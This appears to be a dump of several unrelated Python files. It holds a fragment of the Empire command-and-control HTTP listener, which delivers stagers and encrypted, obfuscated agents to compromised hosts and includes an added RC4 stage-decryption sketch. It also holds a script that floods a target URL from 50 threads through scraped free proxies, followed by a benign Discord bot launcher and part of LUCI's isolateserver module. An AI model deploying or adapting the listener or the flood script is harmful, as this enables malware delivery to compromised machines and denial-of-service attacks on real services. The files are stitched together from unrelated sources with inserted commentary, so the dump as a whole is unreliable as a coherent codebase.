# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results == 'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith('ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if 'not in cache' in results:
# signal the client to restage
print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if results.startswith('STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(' ')[1].strip()
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
try:
hopListener = helpers.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
except TypeError:
tempListenerOptions = listenerOptions
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results == 'VALID':
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
# support any version of tls
pyversion = sys.version_info
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print helpers.color("[!] Killing listener '%s'" % (name))
self.threads[name].kill()
else:
print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.letters
cookie = helpers.random_string(random.randint(6,16), charset=chars)
return cookie
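# --- Illustrative sketch (not part of the original listener code) ---
# The launcher/stager code built above follows a simple staging exchange: the
# routing packet travels base64-encoded in the session cookie, and the server
# replies with a 4-byte IV followed by the stage RC4-encrypted under
# IV + staging key. A standalone version of the client-side decryption step is
# sketched below; the helper names and the blob/staging_key parameters are
# illustrative assumptions, not part of Empire's API.
def _example_rc4(key, data):
    # Plain RC4 (key scheduling + PRGA), mirroring the minimized stager code above.
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + ord(key[i % len(key)])) % 256
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = []
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
    return ''.join(out)
def _example_decrypt_stage(blob, staging_key):
    # First 4 bytes of the response body are the IV, the rest is
    # RC4(IV + staging key, stage), matching generate_stager() above.
    iv, enc = blob[:4], blob[4:]
    return _example_rc4(iv + staging_key, enc)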
|
sanehados.py
|
#!/usr/bin/env python3
import requests
import random
import re
import threading
import os
url = 'http://www.icanhazip.com' #TARGET
httpproxies = []
socks4proxies = []
socks5proxies = []
def get_proxies():
proxies = []
res = requests.get('https://free-proxy-list.net').text
p = re.findall(r'(\d+\.\d+\.\d+\.\d+):(\d+)', res)
for proxy in p:
proxies.append(proxy[0]+':'+proxy[1])
return proxies
def check_proxies(proxies):
s= requests.Session()
for proxy in proxies:
b = False
try:
s.proxies = {"http":proxy,"https":proxy}
res = s.get(url,timeout = 1.5)
if res :
b = True
httpproxies.append(proxy)
except Exception as e:
print("\n Not a http/https proxy")
if b == False:
try:
s.proxies = {"http":"socks5://"+proxy,"https":"socks5://"+proxy}
res = s.get(url,timeout = 1.5)
if res:
b= True
socks5proxies.append(proxy)
except Exception as e:
print("\n Not a socks5 proxy")
if b == False:
try:
s.proxies = {"http":"socks4://"+proxy,"https":"socks4://"+proxy}
res = s.get(url,timeout =1.5)
if res:
socks4proxies.append(proxy)
except Exception as e:
print("\n Not a socks4 proxy")
print(httpproxies)
def attack():
s= requests.Session()
if httpproxies:
hproxy = random.choice(httpproxies)
for i in range(2):
s.proxies = {"http":hproxy,"https":hproxy}
res = s.get(url,timeout = 1.5)
print(res.text)
if socks4proxies:
s4proxy = random.choice(socks4proxies)
for j in range(2):
s.proxies = {"http":"socks4://"+s4proxy,"https":"socks4://"+s4proxy}
res = s.get(url,timeout =1.5)
print(res.text)
if socks5proxies:
s5proxy = random.choice(socks5proxies)
for k in range(2):
s.proxies = {"http":"socks5://"+s5proxy,"https":"socks5://"+s5proxy}
res = s.get(url,timeout = 1.5)
print(res.text)
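# --- Illustrative sketch (not part of the original script) ---
# check_proxies() above probes each proxy as plain HTTP, then SOCKS5, then
# SOCKS4. The same per-scheme probe condensed into one helper; the scheme
# prefixes and the 1.5 second timeout mirror the code above, while the helper
# name and return value are assumptions added for illustration (SOCKS schemes
# still require requests[socks] to be installed).
def probe_proxy(proxy, target=url, timeout=1.5):
    for scheme, prefix in (("http", ""), ("socks5", "socks5://"), ("socks4", "socks4://")):
        try:
            s = requests.Session()
            s.proxies = {"http": prefix + proxy, "https": prefix + proxy}
            if s.get(target, timeout=timeout):
                return scheme
        except Exception:
            continue
    return None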
if __name__ == "__main__":
print("START!")
proxies = get_proxies()
print("Up proxies:")
print(proxies)
print("Party starts in 321..............")
check_proxies(proxies)
for i in range(50):
t = threading.Thread(target=attack)
t.start()
|
aio_launcher.py
|
import asyncio
import math
import os
import shutil
import subprocess
import sys
from multiprocessing import Process, Pipe
import instance
loop = asyncio.get_event_loop()
executable = str(shutil.which('python3.6') or shutil.which('py')).split('/')[-1]
instance_queue = []
instances = []
class PendingInstance:
def __init__(self, i_id, total_shards, shard_ids):
self.id = i_id
self.total_shards = total_shards
self.shard_ids = shard_ids
def launch_next_shard():
if instance_queue:
i = instance_queue.pop(0)
print('Launching instance {}'.format(i.id))
listen, send = Pipe()
p = Process(target=instance.Instance, args=(i.id, i.total_shards, i.shard_ids, send,))
instances.append(p)
p.start()
if listen.recv() == 1:
launch_next_shard()
listen.close()
else:
print('All instances launched!')
def wait(delay: int):
loop.run_until_complete(asyncio.sleep(delay))
if __name__ == '__main__':
shards_per_instance = 1
total_shards = 2
sharded = '--sharded' in sys.argv
if sharded:
print('Sharding enabled. Validating shard count...')
if total_shards >= 40 and total_shards % 16 != 0: # 40 * 2,500 = 100,000 (see: https://github.com/discordapp/discord-api-docs/issues/387)
print('Bad shard count: total_shards must be a multiple of 16')
sys.exit(0)
total_instances = math.ceil(total_shards / shards_per_instance)
print('Using {} instances'.format(total_instances))
wait(5)
for i in range(0, total_instances):
start = i * shards_per_instance
last = min(start + shards_per_instance, total_shards)
ids = list(range(start, last))
print('Appending instance {} to launch queue...'.format(i))
instance_queue.append(PendingInstance(i, total_shards, ids))
else:
instance_queue.append(PendingInstance(0, 1, [0]))
launch_next_shard()
try:
while True: # Keep the main process up
wait(5)
except KeyboardInterrupt:
pass
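# --- Illustrative sketch (not part of the original launcher) ---
# The __main__ block above slices total_shards into contiguous per-instance
# shard ID ranges. The same arithmetic as a standalone helper (the helper name
# is an assumption added for illustration):
def shard_id_ranges(total_shards, shards_per_instance):
    total_instances = math.ceil(total_shards / shards_per_instance)
    return [list(range(i * shards_per_instance,
                       min((i + 1) * shards_per_instance, total_shards)))
            for i in range(total_instances)]
# e.g. shard_id_ranges(5, 2) -> [[0, 1], [2, 3], [4]]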
|
isolateserver.py
|
#!/usr/bin/env python
# Copyright 2013 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Archives a set of files or directories to an Isolate Server."""
from __future__ import print_function
import collections
import errno
import functools
import logging
import optparse
import os
import re
import signal
import stat
import sys
import tarfile
import threading
import time
import zlib
from utils import net
from utils import tools
tools.force_local_third_party()
# third_party/
import colorama
from depot_tools import fix_encoding
from depot_tools import subcommand
import six
from six.moves import queue as Queue
# pylint: disable=ungrouped-imports
import auth
import isolated_format
import isolate_storage
import local_caching
from utils import file_path
from utils import fs
from utils import logging_utils
from utils import net
from utils import on_error
from utils import subprocess42
from utils import threading_utils
__version__ = '0.9.0'
# Version of isolate protocol passed to the server in /handshake request.
ISOLATE_PROTOCOL_VERSION = '1.0'
# Maximum expected delay (in seconds) between successive file fetches or uploads
# in Storage. If it takes longer than that, a deadlock might be happening
# and all stack frames for all threads are dumped to log.
DEADLOCK_TIMEOUT = 5 * 60
# The number of files to check the isolate server per /pre-upload query.
# All files are sorted by likelihood of a change in the file content
# (currently file size is used to estimate this: larger the file -> larger the
# possibility it has changed). Then first ITEMS_PER_CONTAINS_QUERIES[0] files
# are taken and send to '/pre-upload', then next ITEMS_PER_CONTAINS_QUERIES[1],
# and so on. Numbers here is a trade-off; the more per request, the lower the
# effect of HTTP round trip latency and TCP-level chattiness. On the other hand,
# larger values cause longer lookups, increasing the initial latency to start
# uploading, which is especially an issue for large files. This value is
# optimized for the "few thousands files to look up with minimal number of large
# files missing" case.
ITEMS_PER_CONTAINS_QUERIES = (20, 20, 50, 50, 50, 100)
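# --- Illustrative sketch (not part of the original module) ---
# The schedule above is consumed index-by-index and clamped to its last entry
# once exhausted, which is how the upload pipeline below picks its batch
# sizes; the helper name is an assumption added for illustration.
def _example_contains_batch_size(batch_index):
  """Returns the /pre-upload batch size used for the Nth lookup batch."""
  return ITEMS_PER_CONTAINS_QUERIES[
      min(batch_index, len(ITEMS_PER_CONTAINS_QUERIES) - 1)]
# _example_contains_batch_size(0) == 20; _example_contains_batch_size(7) == 100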
# A list of already compressed extension types that should not receive any
# compression before being uploaded.
ALREADY_COMPRESSED_TYPES = [
'7z',
'avi',
'cur',
'gif',
'h264',
'jar',
'jpeg',
'jpg',
'mp4',
'pdf',
'png',
'wav',
'zip',
]
# The delay (in seconds) to wait between logging statements when retrieving the
# required files. This is intended to let the user know that the program is
# still running.
DELAY_BETWEEN_UPDATES_IN_SECS = 30
DEFAULT_DENYLIST = (
# Temporary vim or python files.
r'^.+\.(?:pyc|swp)$',
# .git or .svn directory.
r'^(?:.+' + re.escape(os.path.sep) + r'|)\.(?:git|svn)$',
)
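# --- Illustrative sketch (not part of the original module) ---
# DEFAULT_DENYLIST above is a tuple of regexps matched against paths relative
# to the directory being archived; a minimal filter built on it could look
# like the following (the helper name and the re.match semantics are
# assumptions added for illustration).
def _example_is_denylisted(relpath, denylist=DEFAULT_DENYLIST):
  return any(re.match(pattern, relpath) for pattern in denylist)
# _example_is_denylisted('foo/bar.pyc') -> True
# _example_is_denylisted('foo/bar.py')  -> False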
class Error(Exception):
"""Generic runtime error."""
pass
class Aborted(Error):
"""Operation aborted."""
pass
class AlreadyExists(Error):
"""File already exists."""
def file_read(path, chunk_size=isolated_format.DISK_FILE_CHUNK, offset=0):
"""Yields file content in chunks of |chunk_size| starting from |offset|."""
with fs.open(path, 'rb') as f:
if offset:
f.seek(offset)
while True:
data = f.read(chunk_size)
if not data:
break
yield data
def fileobj_path(fileobj):
"""Return file system path for file like object or None.
The returned path is guaranteed to exist and can be passed to file system
operations like copy.
"""
name = getattr(fileobj, 'name', None)
if name is None:
return None
# If the file like object was created using something like open("test.txt")
# name will end up being a str (such as a function outside our control, like
# the standard library). We want all our paths to be unicode objects, so we
# decode it.
if not isinstance(name, six.text_type):
# We incorrectly assume that UTF-8 is used everywhere.
name = name.decode('utf-8')
# fs.exists requires an absolute path, otherwise it will fail with an
# assertion error.
if not os.path.isabs(name):
return None
if fs.exists(name):
return name
return None
# TODO(tansell): Replace fileobj_copy with shutil.copyfileobj once proper file
# wrappers have been created.
def fileobj_copy(
dstfileobj, srcfileobj, size=-1,
chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Copy data from srcfileobj to dstfileobj.
Providing size means exactly that amount of data will be copied (if there
isn't enough data, an IOError exception is thrown). Otherwise all data until
the EOF marker will be copied.
"""
if size == -1 and hasattr(srcfileobj, 'tell'):
if srcfileobj.tell() != 0:
raise IOError('partial file but not using size')
written = 0
while written != size:
readsize = chunk_size
if size > 0:
readsize = min(readsize, size-written)
data = srcfileobj.read(readsize)
if not data:
if size == -1:
break
raise IOError('partial file, got %s, wanted %s' % (written, size))
dstfileobj.write(data)
written += len(data)
def putfile(srcfileobj, dstpath, file_mode=None, size=-1, use_symlink=False):
"""Put srcfileobj at the given dstpath with given mode.
The function aims to do this as efficiently as possible while still allowing
any possible file like object be given.
Creating a tree of hardlinks has a few drawbacks:
- tmpfs cannot be used for the scratch space. The tree has to be on the same
partition as the cache.
- involves a write to the inode, which advances ctime, cause a metadata
writeback (causing disk seeking).
- cache ctime cannot be used to detect modifications / corruption.
- Some file systems (NTFS) have a 64k limit on the number of hardlink per
partition. This is why the function automatically falls back to copying the
file content.
- /proc/sys/fs/protected_hardlinks causes an additional check to ensure the
same owner is for all hardlinks.
- Anecdotal report that ext2 is known to be potentially faulty on high rate
of hardlink creation.
Creating a tree of symlinks has a few drawbacks:
- Tasks running the equivalent of os.path.realpath() will get the naked path
and may fail.
- Windows:
- Symlinks are reparse points:
https://msdn.microsoft.com/library/windows/desktop/aa365460.aspx
https://msdn.microsoft.com/library/windows/desktop/aa363940.aspx
- Symbolic links are Win32 paths, not NT paths.
https://googleprojectzero.blogspot.com/2016/02/the-definitive-guide-on-win32-to-nt.html
- Symbolic links are supported on Windows 7 and later only.
- SeCreateSymbolicLinkPrivilege is needed, which is not present by
default.
- SeCreateSymbolicLinkPrivilege is *stripped off* by UAC when a restricted
RID is present in the token;
https://msdn.microsoft.com/en-us/library/bb530410.aspx
"""
srcpath = fileobj_path(srcfileobj)
if srcpath and size == -1:
readonly = file_mode is None or (
file_mode & (stat.S_IWUSR | stat.S_IWGRP | stat.S_IWOTH))
if readonly:
# If the file is read only we can link the file
if use_symlink:
link_mode = file_path.SYMLINK_WITH_FALLBACK
else:
link_mode = file_path.HARDLINK_WITH_FALLBACK
else:
# If not read only, we must copy the file
link_mode = file_path.COPY
file_path.link_file(dstpath, srcpath, link_mode)
assert fs.exists(dstpath)
else:
# Need to write out the file
with fs.open(dstpath, 'wb') as dstfileobj:
fileobj_copy(dstfileobj, srcfileobj, size)
if sys.platform == 'win32' and file_mode and file_mode & stat.S_IWRITE:
# On windows, mode other than removing stat.S_IWRITE is ignored. Returns
# early to skip slow/unnecessary chmod call.
return
# file_mode of 0 is actually valid, so need explicit check.
if file_mode is not None:
fs.chmod(dstpath, file_mode)
def zip_compress(content_generator, level=7):
"""Reads chunks from |content_generator| and yields zip compressed chunks."""
compressor = zlib.compressobj(level)
for chunk in content_generator:
compressed = compressor.compress(chunk)
if compressed:
yield compressed
tail = compressor.flush(zlib.Z_FINISH)
if tail:
yield tail
def zip_decompress(
content_generator, chunk_size=isolated_format.DISK_FILE_CHUNK):
"""Reads zipped data from |content_generator| and yields decompressed data.
Decompresses data in small chunks (no larger than |chunk_size|) so that
a zip bomb doesn't cause zlib to preallocate a huge amount of memory.
Raises IOError if data is corrupted or incomplete.
"""
decompressor = zlib.decompressobj()
compressed_size = 0
try:
for chunk in content_generator:
compressed_size += len(chunk)
data = decompressor.decompress(chunk, chunk_size)
if data:
yield data
while decompressor.unconsumed_tail:
data = decompressor.decompress(decompressor.unconsumed_tail, chunk_size)
if data:
yield data
tail = decompressor.flush()
if tail:
yield tail
except zlib.error as e:
raise IOError(
'Corrupted zip stream (read %d bytes) - %s' % (compressed_size, e))
# Ensure all data was read and decompressed.
if decompressor.unused_data or decompressor.unconsumed_tail:
raise IOError('Not all data was decompressed')
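# --- Illustrative sketch (not part of the original module) ---
# zip_compress() and zip_decompress() above both stream chunks, so they can be
# chained directly. A minimal in-memory round trip, purely for illustration
# (the helper name and the 64 KiB chunk size are assumptions):
def _example_zip_round_trip(payload, chunk_size=64 * 1024):
  chunks = (payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size))
  return b''.join(zip_decompress(zip_compress(chunks)))
# _example_zip_round_trip(b'x' * 100000) == b'x' * 100000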
def _get_zip_compression_level(filename):
"""Given a filename calculates the ideal zip compression level to use."""
file_ext = os.path.splitext(filename)[1].lower()
# TODO(csharp): Profile to find what compression level works best.
return 0 if file_ext in ALREADY_COMPRESSED_TYPES else 7
def create_directories(base_directory, files):
"""Creates the directory structure needed by the given list of files."""
logging.debug('create_directories(%s, %d)', base_directory, len(files))
# Creates the tree of directories to create.
directories = set(os.path.dirname(f) for f in files)
for item in list(directories):
while item:
directories.add(item)
item = os.path.dirname(item)
for d in sorted(directories):
if d:
abs_d = os.path.join(base_directory, d)
if not fs.isdir(abs_d):
fs.mkdir(abs_d)
def _create_symlinks(base_directory, files):
"""Creates any symlinks needed by the given set of files."""
for filepath, properties in files:
if 'l' not in properties:
continue
if sys.platform == 'win32':
# TODO(maruel): Create symlink via the win32 api.
logging.warning('Ignoring symlink %s', filepath)
continue
outfile = os.path.join(base_directory, filepath)
try:
os.symlink(properties['l'], outfile) # pylint: disable=E1101
except OSError as e:
if e.errno == errno.EEXIST:
raise AlreadyExists('File %s already exists.' % outfile)
raise
class _ThreadFile(object):
"""Multithreaded fake file. Used by TarBundle."""
def __init__(self):
self._data = threading_utils.TaskChannel()
self._offset = 0
def __iter__(self):
return self._data
def tell(self):
return self._offset
def write(self, b):
self._data.send_result(b)
self._offset += len(b)
def close(self):
self._data.send_done()
class FileItem(isolate_storage.Item):
"""A file to push to Storage.
Its digest and size may be provided in advance, if known. Otherwise they will
be derived from the file content.
"""
def __init__(self, path, algo, digest=None, size=None, high_priority=False):
super(FileItem, self).__init__(
digest,
size if size is not None else fs.stat(path).st_size,
high_priority,
compression_level=_get_zip_compression_level(path))
self._path = path
self._algo = algo
self._meta = None
@property
def path(self):
return self._path
@property
def algo(self):
return self._algo
@property
def digest(self):
if not self._digest:
self._digest = isolated_format.hash_file(self._path, self._algo)
return self._digest
@property
def meta(self):
if not self._meta:
# TODO(maruel): Inline.
self._meta = isolated_format.file_to_metadata(self.path, False)
# We need to hash right away.
self._meta['h'] = self.digest
return self._meta
def content(self):
return file_read(self.path)
class TarBundle(isolate_storage.Item):
"""Tarfile to push to Storage.
Its digest is the digest of all the files it contains. It is generated on the
fly.
"""
def __init__(self, root, algo):
# 2 trailing 512 bytes headers.
super(TarBundle, self).__init__(size=1024)
self._items = []
self._meta = None
self._algo = algo
self._root_len = len(root) + 1
# Same value as for Go.
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/tar_archiver.go
# https://chromium.googlesource.com/infra/luci/luci-go.git/+/master/client/archiver/upload_tracker.go
self._archive_max_size = int(10e6)
@property
def digest(self):
if not self._digest:
self._prepare()
return self._digest
@property
def size(self):
if self._size is None:
self._prepare()
return self._size
def try_add(self, item):
"""Try to add this file to the bundle.
It is extremely naive but this should be just enough for
https://crbug.com/825418.
Future improvements should be in the Go code, and the Swarming bot should be
migrated to use the Go code instead.
"""
if not item.size:
return False
# pylint: disable=unreachable
rounded = (item.size + 512) & ~511
if rounded + self._size > self._archive_max_size:
return False
# https://crbug.com/825418
return False
self._size += rounded
self._items.append(item)
return True
def yield_item_path_meta(self):
"""Returns a tuple(Item, filepath, meta_dict).
If the bundle contains less than 5 items, the items are yielded.
"""
if len(self._items) < 5:
# The tarball is too small, yield individual items, if any.
for item in self._items:
yield item, item.path[self._root_len:], item.meta
else:
# This ensures self._meta is set.
p = self.digest + '.tar'
# Yield itself as a tarball.
yield self, p, self._meta
def content(self):
"""Generates the tarfile content on the fly."""
obj = _ThreadFile()
def _tar_thread():
try:
t = tarfile.open(
fileobj=obj, mode='w', format=tarfile.PAX_FORMAT, encoding='utf-8')
for item in self._items:
logging.info(' tarring %s', item.path)
t.add(item.path)
t.close()
except Exception:
logging.exception('Internal failure')
finally:
obj.close()
t = threading.Thread(target=_tar_thread)
t.start()
try:
for data in obj:
yield data
finally:
t.join()
def _prepare(self):
h = self._algo()
total = 0
for chunk in self.content():
h.update(chunk)
total += len(chunk)
# pylint: disable=attribute-defined-outside-init
# This is not true, they are defined in Item.__init__().
self._digest = h.hexdigest()
self._size = total
self._meta = {
'h': self.digest,
's': self.size,
't': u'tar',
}
class BufferItem(isolate_storage.Item):
"""A byte buffer to push to Storage."""
def __init__(self, buf, algo, high_priority=False):
super(BufferItem, self).__init__(
digest=algo(buf).hexdigest(),
size=len(buf),
high_priority=high_priority)
self._buffer = buf
def content(self):
return [self._buffer]
class Storage(object):
"""Efficiently downloads or uploads large set of files via StorageApi.
Implements compression support, parallel 'contains' checks, parallel uploads
and more.
Works only within single namespace (and thus hashing algorithm and compression
scheme are fixed).
Spawns multiple internal threads. Thread safe, but not fork safe. Modifies
signal handlers table to handle Ctrl+C.
"""
def __init__(self, storage_api):
self._storage_api = storage_api
self._cpu_thread_pool = None
self._net_thread_pool = None
self._aborted = False
self._prev_sig_handlers = {}
@property
def server_ref(self):
"""Shortcut to get the server_ref from storage_api.
This can be used to get the underlying hash_algo.
"""
return self._storage_api.server_ref
@property
def cpu_thread_pool(self):
"""ThreadPool for CPU-bound tasks like zipping."""
if self._cpu_thread_pool is None:
threads = max(threading_utils.num_processors(), 2)
max_size = long(2)**32 if sys.version_info.major == 2 else 2**32
if sys.maxsize <= max_size:
# On 32 bits userland, do not try to use more than 16 threads.
threads = min(threads, 16)
self._cpu_thread_pool = threading_utils.ThreadPool(2, threads, 0, 'zip')
return self._cpu_thread_pool
@property
def net_thread_pool(self):
"""AutoRetryThreadPool for IO-bound tasks, retries IOError."""
if self._net_thread_pool is None:
self._net_thread_pool = threading_utils.IOAutoRetryThreadPool()
return self._net_thread_pool
def close(self):
"""Waits for all pending tasks to finish."""
logging.info('Waiting for all threads to die...')
if self._cpu_thread_pool:
self._cpu_thread_pool.join()
self._cpu_thread_pool.close()
self._cpu_thread_pool = None
if self._net_thread_pool:
self._net_thread_pool.join()
self._net_thread_pool.close()
self._net_thread_pool = None
logging.info('Done.')
def abort(self):
"""Cancels any pending or future operations."""
# This is not strictly threadsafe, but in the worst case the logging message
# will be printed twice. Not a big deal. In other places it is assumed that
# unprotected reads and writes to _aborted are serializable (it is true
# for python) and thus no locking is used.
if not self._aborted:
logging.warning('Aborting... It can take a while.')
self._aborted = True
def __enter__(self):
"""Context manager interface."""
assert not self._prev_sig_handlers, self._prev_sig_handlers
for s in (signal.SIGINT, signal.SIGTERM):
self._prev_sig_handlers[s] = signal.signal(s, lambda *_args: self.abort())
return self
def __exit__(self, _exc_type, _exc_value, _traceback):
"""Context manager interface."""
self.close()
while self._prev_sig_handlers:
s, h = self._prev_sig_handlers.popitem()
signal.signal(s, h)
return False
def upload_items(self, items, verify_push=False):
"""Uploads a generator of Item to the isolate server.
It figures out what items are missing from the server and uploads only them.
It uses 3 threads internally:
- One to create batches based on a timeout
- One to dispatch the /contains RPC and field the missing entries
- One to field the /push RPC
The main threads enumerates 'items' and pushes to the first thread. Then it
join() all the threads, waiting for them to complete.
(enumerate items of Item, this can be slow as disk is traversed)
|
v
_create_items_batches_thread Thread #1
(generates list(Item), every 3s or 20~100 items)
|
v
_do_lookups_thread Thread #2
| |
v v
(missing) (was on server)
|
v
_handle_missing_thread Thread #3
|
v
(upload Item, append to uploaded)
Arguments:
items: list of isolate_storage.Item instances that represents data to
upload.
verify_push: verify files are uploaded correctly by fetching from server.
Returns:
List of items that were uploaded. All other items are already there.
Raises:
The first exception being raised in the worker threads.
"""
incoming = Queue.Queue()
batches_to_lookup = Queue.Queue()
missing = Queue.Queue()
uploaded = []
exc_channel = threading_utils.TaskChannel()
def _create_items_batches_thread():
"""Creates batches for /contains RPC lookup from individual items.
Input: incoming
Output: batches_to_lookup
"""
try:
batch_size_index = 0
batch_size = ITEMS_PER_CONTAINS_QUERIES[batch_size_index]
batch = []
while not self._aborted:
try:
item = incoming.get(True, timeout=3)
if item:
batch.append(item)
except Queue.Empty:
item = False
if len(batch) == batch_size or (not item and batch):
if len(batch) == batch_size:
batch_size_index += 1
batch_size = ITEMS_PER_CONTAINS_QUERIES[
min(batch_size_index, len(ITEMS_PER_CONTAINS_QUERIES)-1)]
batches_to_lookup.put(batch)
batch = []
if item is None:
break
except Exception:
exc_channel.send_exception()
finally:
# Unblock the next pipeline.
batches_to_lookup.put(None)
def _do_lookups_thread():
"""Enqueues all the /contains RPCs and emits the missing items.
Input: batches_to_lookup
Output: missing, to_upload
"""
try:
channel = threading_utils.TaskChannel()
def _contains(b):
if self._aborted:
raise Aborted()
return self._storage_api.contains(b)
pending_contains = 0
while not self._aborted:
batch = batches_to_lookup.get()
if batch is None:
break
self.net_thread_pool.add_task_with_channel(
channel, threading_utils.PRIORITY_HIGH, _contains, batch)
pending_contains += 1
while pending_contains and not self._aborted:
try:
v = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
pending_contains -= 1
for missing_item, push_state in v.items():
missing.put((missing_item, push_state))
while pending_contains and not self._aborted:
for missing_item, push_state in channel.next().items():
missing.put((missing_item, push_state))
pending_contains -= 1
except Exception:
exc_channel.send_exception()
finally:
# Unblock the next pipeline.
missing.put((None, None))
def _handle_missing_thread():
"""Sends the missing items to the uploader.
Input: missing
Output: uploaded
"""
try:
with threading_utils.DeadlockDetector(DEADLOCK_TIMEOUT) as detector:
channel = threading_utils.TaskChannel()
pending_upload = 0
while not self._aborted:
try:
missing_item, push_state = missing.get(True, timeout=5)
if missing_item is None:
break
self._async_push(channel, missing_item, push_state, verify_push)
pending_upload += 1
except Queue.Empty:
pass
detector.ping()
while not self._aborted and pending_upload:
try:
item = channel.next(timeout=0)
except threading_utils.TaskChannel.Timeout:
break
